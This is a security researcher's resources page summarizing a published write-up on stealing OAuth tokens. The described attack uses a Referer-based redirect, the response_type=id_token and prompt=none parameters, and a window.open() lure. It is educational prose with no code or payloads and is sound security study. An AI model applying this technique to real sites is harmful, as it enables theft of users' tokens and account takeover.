Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

OAuth is a fickle monster. This post dives into a website that was automatically redirecting to the Referer header when coming back from the OAuth flow. Likely, this was a multi-website system where they had a global OAuth page and needed to get back to the original page. Of note, the Referer header survives redirects.

An arbitrary redirect in OAuth is usually an automatic game over. This is because the auth information itself is stored within the fragment or parameters in a URL. So, the goal of the attack was to trigger a redirect to steal the token information of the user.

Upon trying to abuse this functionality, they learned that client-side redirects will remove the fragment but server-side will not. In the standard flow for OAuth, a client-side redirect was used. However, by changing the type to be id_token instead, this triggered a server-side redirect to keep the code around.

They tried reviewing the OAuth providers used by the application: Facebook, GitHub and Google. Facebook had a confirmation step that changed the referer, and GitHub doesn't use the response_type parameter. Gmail had a selection screen if users had more than one account. By adding the parameter prompt=none, this prompt was bypassed though.

The final flow of the attack tricked a victim into visiting their website and used window.open() to trigger the OAuth flow. Since they were the referrer of this interaction, it would eventually redirect to their website, where they could steal the token information.

This blog post was a good example of seeing bad functionality and finding the primitives to trigger it properly. This contained numerous small tricks and required considerable perseverance. Great write-up!